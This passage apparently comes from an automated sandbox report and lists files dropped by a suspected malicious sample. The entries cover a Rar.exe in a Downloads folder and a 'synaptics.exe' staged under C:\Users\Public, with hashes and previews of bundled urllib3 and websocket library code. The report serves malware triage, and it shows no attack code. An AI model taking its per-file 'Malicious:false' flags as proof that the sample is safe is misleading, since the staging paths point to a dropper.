                                                                                                                                                                                      Preview:"""The match_hostname() function from Python 3.5, essential when using SSL."""..# Note: This file is under the PSF license as the code comes from the python.# stdlib. http://docs.python.org/3/license.html.# It is modified to remove commonName support...from __future__ import annotations..import ipaddress.import re.import typing.from ipaddress import IPv4Address, IPv6Address..if typing.TYPE_CHECKING:. from .ssl_ import _TYPE_PEER_CERT_RET_DICT..__version__ = "3.5.0.1"...class CertificateError(ValueError):. pass...def _dnsname_match(. dn: typing.Any, hostname: str, max_wildcards: int = 1.) -> typing.Match[str] | None | bool:. """Matching according to RFC 6125, section 6.4.3.. http://tools.ietf.org/html/rfc6125#section-6.4.3. """. pats = []. if not dn:. return False.. # Ported from python3-syntax:. # leftmost, *remainder = dn.split(r'.'). parts = dn.split(r"."). leftmost = parts[0]. remainder = parts[1:].. wildcards = leftmost.count("*").
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8887
                                                                                                                                                                                      Entropy (8bit):4.514513834687227
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:hUrcuD3X8sVqqJo6g3Nu0a76pyPsLxIjjhad:hKlD3xVV6kPs+XY
                                                                                                                                                                                      MD5:47BEAC947B716FC99C5415D8B165AB40
                                                                                                                                                                                      SHA1:1274169EA2A11D1E8243020DD3E49F66463E9EC7
                                                                                                                                                                                      SHA-256:C29AC1BE19208DD76184CC3011B1F23F8972807A4FE924BEE3912E87BA1EE3C9
                                                                                                                                                                                      SHA-512:E277F753860C78E5A0DFA22266FDFA6693C536FB55FB8B1CAB6156973168247152ADFD8E03E77215131921AECC35835D3FB577B049B099F356621380C406DCB7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import io.import socket.import ssl.import typing..from ..exceptions import ProxySchemeUnsupported..if typing.TYPE_CHECKING:. from typing_extensions import Self.. from .ssl_ import _TYPE_PEER_CERT_RET, _TYPE_PEER_CERT_RET_DICT..._WriteBuffer = typing.Union[bytearray, memoryview]._ReturnValue = typing.TypeVar("_ReturnValue")..SSL_BLOCKSIZE = 16384...class SSLTransport:. """. The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. implement TLS within TLS... The class supports most of the socket API operations.. """.. @staticmethod. def _validate_ssl_context_for_tls_in_tls(ssl_context: ssl.SSLContext) -> None:. """. Raises a ProxySchemeUnsupported if the provided ssl_context can't be used. for TLS in TLS... The only require
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10346
                                                                                                                                                                                      Entropy (8bit):4.487203103410679
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:FLWn+l/uQiHf8WSBXAG5yq3QnqXkHhsy6+:xWQ/uQA0MkGmCc+
                                                                                                                                                                                      MD5:F4A48CE35A9B5729FEEA01D44490FCCF
                                                                                                                                                                                      SHA1:166C5F455B7F05AD8D63687B29A0BF0724EBB2D5
                                                                                                                                                                                      SHA-256:E1E4F5155799654EE1EE6603D49AB639735EE1FC5E91D36F868594919BAC4690
                                                                                                                                                                                      SHA-512:669DA13231076509EC6F7005F55A91FC1364EDA287185842B738F0360088C7624EDA43C7151FD1CA1504CCD0D324FC54302BD4FCFC590027BA6264763F06485C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import time.import typing.from enum import Enum.from socket import getdefaulttimeout..from ..exceptions import TimeoutStateError..if typing.TYPE_CHECKING:. from typing import Final...class _TYPE_DEFAULT(Enum):. # This value should never be passed to socket.settimeout() so for safety we use a -1.. # socket.settimout() raises a ValueError for negative values.. token = -1..._DEFAULT_TIMEOUT: Final[_TYPE_DEFAULT] = _TYPE_DEFAULT.token.._TYPE_TIMEOUT = typing.Optional[typing.Union[float, _TYPE_DEFAULT]]...class Timeout:. """Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout=timeout).. resp = http.request("GET", "https://example.com/").. print(resp.status).. Or per-request (which overrides the default for the pool):.. .. code-block:: python
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15213
                                                                                                                                                                                      Entropy (8bit):4.872083630674659
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:cJKD+3h7DAmC+kN5t7+RsFkz6zY6cHZy12x:cJxDXC+kflVkOzY6cHIK
                                                                                                                                                                                      MD5:811AF7DB53FFD4120CE4D151FAFA1F24
                                                                                                                                                                                      SHA1:4CA2FFF416F7893D662E257A6E1E7090524545AC
                                                                                                                                                                                      SHA-256:C07391869F344405F24E5008913A8B1734AB914EC9DF8643C57FAD37AE4C0599
                                                                                                                                                                                      SHA-512:3EA9FA41032E093F417A75420A6D94212E226999F4FEEC0C26DDC6D8845F43CD8FC4300610E62DF37A087CE3BE10CBEDB41B0EBA17C6685CA8D8E5F46CB504B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import re.import typing..from ..exceptions import LocationParseError.from .util import to_str..# We only want to normalize urls with an HTTP(S) scheme..# urllib3 infers URLs without a scheme (None) to be http.._NORMALIZABLE_SCHEMES = ("http", "https", None)..# Almost all of these patterns were derived from the.# 'rfc3986' module: https://github.com/python-hyper/rfc3986._PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}")._SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)")._URI_RE = re.compile(. r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?". r"(?://([^\\/?#]*))?". r"([^?#]*)". r"(?:\?([^#]*))?". r"(?:#(.*))?$",. re.UNICODE | re.DOTALL,.).._IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}"._HEX_PAT = "[0-9A-Fa-f]{1,4}"._LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=_HEX_PAT, ipv4=_IPV4_PAT)._subs = {"hex": _HEX_PAT, "ls32": _LS32_PAT}._variations = [. # 6( h16 ":" ) ls32. "(?:%(hex)s:){6}%(ls32)s",. #
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1146
                                                                                                                                                                                      Entropy (8bit):4.443278207032918
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1R7Hhv+sQK995Vb624+Q3+shD9bVb62A+QUH3jtIB2qBoEcZwtj4ri:PUsVnDexdOshDHeVdw2BR42
                                                                                                                                                                                      MD5:3C5DC84F86959542DF8F2D38FDCD9366
                                                                                                                                                                                      SHA1:AC7A579CE7E37CE8BF215F97B9BFB80B149B0F68
                                                                                                                                                                                      SHA-256:8F795B64AD633F28B00F7E13F08809CDD5846554FEE04FB4BD82098BD52378D0
                                                                                                                                                                                      SHA-512:A67CDF2BB9B97217A8E99EDA0089961A5B4EA6BDD5BCB0BA490469FFFF422430373D61B2E9FF3E5B54CE23C5361C07EBD9B845003D35DC7FDCF3DCCA7A826A07
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import typing.from types import TracebackType...def to_bytes(. x: str | bytes, encoding: str | None = None, errors: str | None = None.) -> bytes:. if isinstance(x, bytes):. return x. elif not isinstance(x, str):. raise TypeError(f"not expecting type {type(x).__name__}"). if encoding or errors:. return x.encode(encoding or "utf-8", errors=errors or "strict"). return x.encode()...def to_str(. x: str | bytes, encoding: str | None = None, errors: str | None = None.) -> str:. if isinstance(x, str):. return x. elif not isinstance(x, bytes):. raise TypeError(f"not expecting type {type(x).__name__}"). if encoding or errors:. return x.decode(encoding or "utf-8", errors=errors or "strict"). return x.decode()...def reraise(. tp: type[BaseException] | None,. value: BaseException,. tb: TracebackType | None = None,.) -> typing.NoReturn:. try:. if value.__traceback__ is not t
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4423
                                                                                                                                                                                      Entropy (8bit):4.57958390877449
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:6e0jQGAov2Rq9rFKYuBArDFL2c8WR9tg6L2LcJqKdDLfsWG1JAEg01AEDn:30jQGf9hKorDp2c86AW2LcJqyfsWgBD
                                                                                                                                                                                      MD5:D333C4CDB4CF3074C1245164C65AAC59
                                                                                                                                                                                      SHA1:B8FFB5126AB052A8798F03EFB7BC3D8C1BD6837A
                                                                                                                                                                                      SHA-256:FE987C22B511DECA8FAA2D0EA29420254947E30CE419E3390A2C80ED7186B662
                                                                                                                                                                                      SHA-512:A30CF0681A11CCB899D2FDD3CF355482DD8D3F51F2EFA4AE88C0A4B65C6E1A53FBB734F7BAE2DC51E85B5BE4AA767237EA14596FDECF66A715D51563B908AC5D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations..import select.import socket.from functools import partial..__all__ = ["wait_for_read", "wait_for_write"]...# How should we wait on sockets?.#.# There are two types of APIs you can use for waiting on sockets: the fancy.# modern stateful APIs like epoll/kqueue, and the older stateless APIs like.# select/poll. The stateful APIs are more efficient when you have a lots of.# sockets to keep track of, because you can set them up once and then use them.# lots of times. But we only ever want to wait on a single socket at a time.# and don't want to keep track of state, so the stateless APIs are actually.# more efficient. So we want to use select() or poll()..#.# Now, how do we choose between select() and poll()? On traditional Unixes,.# select() has a strange calling convention that makes it slow, or fail.# altogether, for high-numbered file descriptors. The point of poll() is to fix.# that, so on Unixes, we prefer poll()..#.# On Windows, there is no poll() (o
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):833
                                                                                                                                                                                      Entropy (8bit):4.959847702307672
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CV9ZwI4IEGMFj27dYCQLU0E+9o/HQknd7Gps2khWa98e9P8lB9YBUwaT:S9Zl4IpheU0E+4HQk1Gps2Gtd1ch
                                                                                                                                                                                      MD5:7775948E379A698B6F7F0DB8926A95AE
                                                                                                                                                                                      SHA1:E062FC33B86A7B9250A9EB10C8F448C1B9A0A86C
                                                                                                                                                                                      SHA-256:1AF5694CF923BE16041997235ECCD27EBB3615A547B9D51D1A0192A9FFD16F0E
                                                                                                                                                                                      SHA-512:C3ACBBB091977ED497C60DCD01A51DDC4DDA259033B65B3CFA55D6755BD045E23B47CB9C6F812123C2E72CD5EDD793C116BEAA8FD2F43F177E78A77F2EF34D64
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".__init__.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..""".from ._abnf import *.from ._app import WebSocketApp as WebSocketApp, setReconnect as setReconnect.from ._core import *.from ._exceptions import *.from ._logging import *.from ._socket import *..__version__ = "1.8.0".
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):982
                                                                                                                                                                                      Entropy (8bit):5.482247975063762
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:Z5G9Zl4IpheU0E+4HQk1Gps2OJjGJq4E+P:ZAl4+h0CH31KiJjG2g
                                                                                                                                                                                      MD5:2992602B10AECD1F89DD35F6CE079345
                                                                                                                                                                                      SHA1:545AAE4996C38E967493C1ACBD303B282C9D055E
                                                                                                                                                                                      SHA-256:3B31F9F9797E296972C7F0D92288A54654D8F65E2FB47DCD432A33DD3C94A1BA
                                                                                                                                                                                      SHA-512:F3BC8441A9E574C91D0421B24D11D0B18E2E92AF5114F887A89FBBA6063BF0A97AB7A189B0233488E9698F2296CBA4F3249749ED3E86CB12996D2A6B421F09A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fA........................@...sD...d.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.Z.d.S.).ab....__init__.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.......)...*)...WebSocketApp..setReconnectz.1.8.0N)...__doc__Z._abnfZ._appr....r....Z._core.._exceptionsZ._logging.._socket..__version__..r....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\__init__.py..<module>....s....................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11151
                                                                                                                                                                                      Entropy (8bit):5.411950423612766
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:pfJmK7EmCkzdMfdx4cIl+UqLcHo36L5FskQJeCiROUppvaZdre82l4rn0WFV:DmTSulap8UCAo3Kn4GHppCe82+rn0o
                                                                                                                                                                                      MD5:E47CF4AA8EEC779F22375E30C8768961
                                                                                                                                                                                      SHA1:1D1CAD9FF8D547515B6CD2BBB5C7F1B7BF189BE9
                                                                                                                                                                                      SHA-256:63798463C9D7A79A947FE5E4B5E7B7E1AF7A9A906A644A5457B0FF54C55D6DFA
                                                                                                                                                                                      SHA-512:CD6E6A22943FD75FDCD9548EC686AE4566E02BAAE75A4B34D9AD61AC715476F523C3BEE42D7362267FCFB98624B350186AC94D2CC0A364220D0ACFC35419DC2F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f18.......................@...sJ...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....z.d.d.l.m.Z...d.e.j.d.e.j.d.e.f.d.d...Z.W.n...e.y]......e.j.Z.d.e.j.d.e.j.d.e.f.d.d...Z.Y.n.w.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%e.e.e.e.e.e.e.e e!e"e#e$f.Z&G.d.d...d...Z'G.d d!..d!..Z(G.d"d#..d#..Z)d.S.)$.....N)...Lock)...Callable..Optional..Union.....)...WebSocketPayloadException..WebSocketProtocolException)...validate_utf8)...XorMaskerSimple..mask_value..data_value..returnc....................C...s....t.|.....|...}.|.S...N).r......process).r....r....Z.mask_result..r.....AC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_abnf.py.._mask%...s........r....c....................C...sH...t.|...}.t...|.t...}.t...|.|.d.....|.d.|.d.........t...}.|.|.A...|.t...S.).N.....)...len..int..from_bytes..native_byteorder..to_bytes).r....r....Z.datalenZ.int_data_valueZ.int_mask_valuer....r....r....r....-...s................).
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):19439
                                                                                                                                                                                      Entropy (8bit):5.402801094079532
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:hHJMnoF3eIfFDxNUbVr5mEtr0zSo0/3888tiYn:hHJMnoF3eIddNcrggqSo0/98ln
                                                                                                                                                                                      MD5:9787965DF1835A7A87A17C25E287A9E9
                                                                                                                                                                                      SHA1:F8B307DEA8E26EBC3020972BB0EA48A7FF32D414
                                                                                                                                                                                      SHA-256:E6E20C680CEF12480B970E68D7191748E4E93D8532CA18101B2004F1DED16B25
                                                                                                                                                                                      SHA-512:CCAFB454FB9AB7436074FE4A88581C67421109B663534B8D6962600ADE6DDD4066FFD647DC00B21DF65529C2199F12A6D633DC072CA159400A080ADC15FA443F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fp^.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.g.Z.d.a.d.e.d.d.f.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z G.d.d...d...Z!d.S.)......N)...Any..Callable..Optional..Union.....)..._logging)...ABNF)...WebSocket..getdefaulttimeout).."WebSocketConnectionClosedException..WebSocketException..WebSocketTimeoutException)...SSLEOFError)...parse_url..WebSocketApp..reconnectInterval..returnc....................C...s....|.a.d.S...N)...RECONNECT).r......r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_app.py..setReconnect+...s......r....c....................@...sf...e.Z.d.Z.d.Z.d.e.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.S.)...DispatcherBasez.. DispatcherBase. ..app..ping_timeoutNr....c....................C...s....|.|._.|.|._.d.S.r....).r....r....)...selfr....r...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1834
                                                                                                                                                                                      Entropy (8bit):5.107429666805262
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:IYq+PHq2cYReITZg0ZVzD0oOBzttwutP5iIv0UdzcbVHckuxj7kV5ZFgrI:5lPlcBI7gPBzreIv0UdzMcLgV5KI
                                                                                                                                                                                      MD5:38FA929CFCFFAAD6955999E2FE5771E3
                                                                                                                                                                                      SHA1:9A93E24C6E5C2B2FA1ABA8FDF18A2A4C07BCAD05
                                                                                                                                                                                      SHA-256:B87E648572FBA12A2D642823468818019D809052A8DCA59697ECA10B4F13E19E
                                                                                                                                                                                      SHA-512:9E7655351F7D140EAB7818A1A898FC1D8FA135E90418B123C7FB59B98BC0B325036CEF9BCDFCBE3CF7EAD10573BB433772193765358F8748BA4761B5CED257F8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f_........................@...s(...d.d.l.Z.d.d.l.m.Z.....G.d.d...d...Z.d.S.)......N)...Optionalc....................@...sP...e.Z.d.Z.d.d.d...Z.d.e.e...d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.e.f.d.d...Z.d.S.)...SimpleCookieJar..returnNc....................C...s....i.|._.d.S.).N)...jar)...self..r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_cookiejar.py..__init__....s......z.SimpleCookieJar.__init__..set_cookiec....................C...s....|.r=t.j...|...}.|.....D.]2}.|...d.....}.r<|...d...s.d.|.....}.|.j...|...r+|.j...|...n.t.j.....}.|...|.....|.|.j.|.....<.q.d.S.d.S...N..domain...)...http..cookies..SimpleCookie..values..get..startswithr......update..lower).r....r......simple_cookie..vr......cookier....r....r......add....s..................................z.SimpleCookieJar.addc....................C...sV...|.r't.j...|...}.|.....D.].}.|...d.....}.r&|...d...s.d.|.....}.|.|.j.|.....<.q.d.S.d.S.r....).r....r....r....r....r....r....r....r....).r....r....r....r....r.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18751
                                                                                                                                                                                      Entropy (8bit):5.2601579536628655
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:/5oj/9NgJvx938wlJYz2citggg7zXEjsVdTPe:/a9N+3rlO2ciU7DEYnTPe
                                                                                                                                                                                      MD5:21A5CE6458B8B393E4B7BD05858DB681
                                                                                                                                                                                      SHA1:66E1AACCE9603888307F851B50043D08D2DF40AD
                                                                                                                                                                                      SHA-256:A972D2B9E252D9FACEFB014E686DBF354BE298CA4C870A9DA00F881D3124EF27
                                                                                                                                                                                      SHA-512:5A162829A9A91AD683EE776AB98E2C834461DD7AE32BF746CB5C54095736EFFE1F6C770217B6595629B085FEA003B1E39779B53581BB30FC2BACBA9C8E155E61
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fXR.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z!..d.d.l"m#Z#....d.d.g.Z$G.d.d...d...Z%d.e%f.d.e&f.d.d...Z'd.S.)......N)...Optional..Union.....)...ABNF..STATUS_NORMAL..continuous_frame..frame_buffer)...WebSocketProtocolException."WebSocketConnectionClosedException)...SUPPORTED_REDIRECT_STATUSES..handshake)...connect..proxy_info)...debug..error..trace..isEnabledForError..isEnabledForTrace)...getdefaulttimeout..recv..send..sock_opt)...ssl)...NoLock..WebSocket..create_connectionc....................@...s ...e.Z.d.Z.d.Z.............dPd.e.d.e.d.e.f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.e.e.e...Z.d.d...Z.e.e...Z.d.d...Z.e.e...Z.d.d...Z.d d!..Z.e.e...Z.d"d#..Z.e.j.f.d$e.e.e.f...d%e.d.e.f.d&d'..Z.d(e.d.e.f.d)d*..Z.d+e.e.e f...d.e.f.d,d-..Z!d.e.f.d.d/..Z"d$e.d.e
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2940
                                                                                                                                                                                      Entropy (8bit):5.121989315034816
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:rJC9Vw3WRenl4+h0CH31KO8ZpKJjznx8uDCDcDHMjk9LQVR3qh89CK:c9Vw3Cenl4s3HFKDZpsztDAcDsMQH79B
                                                                                                                                                                                      MD5:21EA6D626CB87B6B23F719C05BE63BD7
                                                                                                                                                                                      SHA1:6A5563FEFBF089F3493207051ED92ADF8FFDF95B
                                                                                                                                                                                      SHA-256:982F189065EA6D8AAC61CF721F8CED8EE717F0803A1B69BA952FAA8A3144A9B9
                                                                                                                                                                                      SHA-512:BFE15CCFE7DE580BE7F0DE52E48035DD4EF31A3C6DE1A793EF03C161D1BCE47BB8858FD2C12FBFB0568FDD61C635E052EAAD719597BFE8E026CFEC5E10420566
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).ae...._exceptions.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..c....................@........e.Z.d.Z.d.Z.d.S.)...WebSocketExceptionz$. WebSocket exception class.. N....__name__..__module__..__qualname__..__doc__..r....r.....GC:\Users\Public\QExvbmVOb25l\l
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5693
                                                                                                                                                                                      Entropy (8bit):5.69047276580604
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:bZr4s3HFKqfGn4zflfe8mtj6my9mZH5yEG/Zd2ROHvNI2Mr6uURW8R6:1r33HxO4zfc8IHChd+qhRPR6
                                                                                                                                                                                      MD5:9E34B36B0ED9C5FC4800426B9434E3A9
                                                                                                                                                                                      SHA1:9521174353C433EB567FDAD1E51E937542157F1A
                                                                                                                                                                                      SHA-256:F89812DDF3CA6E2BAB1807605188EDCEFD66886361067ECF5136BE3548DE0524
                                                                                                                                                                                      SHA-512:D89B430C7E0E874D18820C1AF9BD2D821A186EB88D4AD453239636D18EE4909A88500C14FB19AF25BF6F1AB4583E269C592D6C76965BA50CBB0238FA6A41D048
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...sR...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.e.j.e.j.e.j.e.j.e.j.f.Z.e.e.j.f...Z.e...Z.G.d.d...d...Z d.e!d.e!d.e"d.e!d.e f.d.d...Z#d.e!d.e!f.d.d...Z$d.e!d.e!d.e!d.e"d.e%d.e&f.d.d...Z'e.f.d.e&d.e&f.d.d...Z(d.d d!..Z)d"e!d.e&f.d#d$..Z*d.e!f.d%d&..Z+d.S.)'ad...._handshake.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the Licens
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8100
                                                                                                                                                                                      Entropy (8bit):5.658839581302532
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:G33HeL4DWl5HfG443QYGo3R0wTk9SJXg2QhkmYeG:G3E4DWl5/23QYGoh0icdkveG
                                                                                                                                                                                      MD5:B7F1CBD1E15EA065CC3803D71F31970D
                                                                                                                                                                                      SHA1:1C01AA68D244FE3005763D6BC051979BA75DA10E
                                                                                                                                                                                      SHA-256:360706C6237789E2DF88FE1D364FDD51875BA2E54E75999285345534733724F3
                                                                                                                                                                                      SHA-512:D23CE8BD73E752051BAE2CF065EBE4DBAE7043C38876173525425D59DB57B04F88905CFD7DF1F5F450F000B856FBE83AB6C420129855E460156E4161FD679C58
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
